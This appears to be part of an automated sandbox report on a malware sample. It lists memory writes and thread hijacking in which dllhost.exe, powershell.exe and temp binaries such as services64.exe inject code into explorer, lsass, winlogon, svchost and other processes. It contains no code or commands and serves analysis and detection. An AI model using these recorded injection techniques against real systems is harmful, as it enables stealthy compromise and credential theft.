        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 280C22F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1FB970000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 25EE91B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1AD31C90000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226AD1B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 138D43C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 236C6DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: CD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 15829E70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D643A60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20631820000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1CCE3640000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1858EA10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2942EBE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23D96450000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C8A0380000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 26D9F390000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E5EF030000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 248D2920000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 21C0EE50000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 165EDA50000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140000000 value: 4DJump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140001000 value: 48Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140367000 value: 1EJump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 1404A0000 value: F0Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140753000 value: 00Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140775000 value: 48Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140776000 value: C5Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140777000 value: 48Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 140779000 value: 48Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 14077B000 value: 60Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 14077C000 value: 00Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 14077D000 value: 00Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: PID: 1528 base: 81E010 value: 00Jump to behavior
        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 3968 base: 29E0000 value: 4D
        Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1528 base: CD0000 value: 4D
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\System32\conhost.exeThread register set: target process: 1528Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1528
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4672
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7560
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5880
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7528
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4912
        Sets debug register (to hijack the execution of another thread)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 1528 1
        Writes to foreign memory regions
        Source: C:\Users\user\AppData\Local\Temp\paint.exeMemory written: C:\Windows\System32\conhost.exe base: 113DAF00000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 12BE3BE0000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 21E7B340000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000Jump to behavior
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 81E010Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 236ACAA0000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 780000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 800000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3B0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 231A3A3010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: B712225010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: E7A5297010
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 79686B5010
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC60380000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 161C7340000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 233B91B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 210918F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2062E960000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282B8D70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22856DC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207BAC00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27A01800000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2992B230000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23227590000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28098F60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23ACD780000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1C1330000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192A4090000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5112C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2848B1D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A12F60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8115C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C8B4690000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 213C6680000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: B80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25B905C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2905A8E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5FA180000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19296180000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24ED0B70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20955300000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B054660000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15D00D80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20983090000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 278CACC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAE2270000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 284FF340000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22687920000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B661F20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD637D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 29E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2081CC80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23263180000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2064B670000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F535400000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 149A8F80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A0126F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 251F17A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000
